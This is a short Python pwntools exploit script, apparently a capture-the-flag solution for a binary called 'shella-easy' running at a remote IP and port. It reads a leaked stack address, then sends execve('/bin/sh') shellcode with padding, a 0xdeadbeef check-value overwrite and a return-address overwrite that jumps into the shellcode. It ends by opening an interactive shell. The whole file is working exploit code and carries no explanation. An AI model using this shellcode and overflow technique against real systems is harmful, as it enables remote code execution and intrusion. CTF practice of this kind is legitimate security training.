#!/usr/bin/python
from pwn import *
#______________________________________________________________________________________________________________
rem = "52.15.182.55 12345"
cmd = "./shella-easy"
local = 0
#______________________________________________________________________________________________________________
if bool(local): p = process(cmd.split(' ')); raw_input("-PID");
else: rem = rem.split(' '); p = remote(rem[0], rem[1])
#______________________________________________________________________________________________________________
buf = int(p.recv().split(' ')[4], 16)

sc = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
payload = sc + "A"*(64-len(sc))+ p32(0xdeadbeef) + "A"*8 + p32(buf)
p.sendline(payload) 

p.interactive()
#______________________________________________________________________________________________________________
if bool(local): raw_input("-END")
p.close()
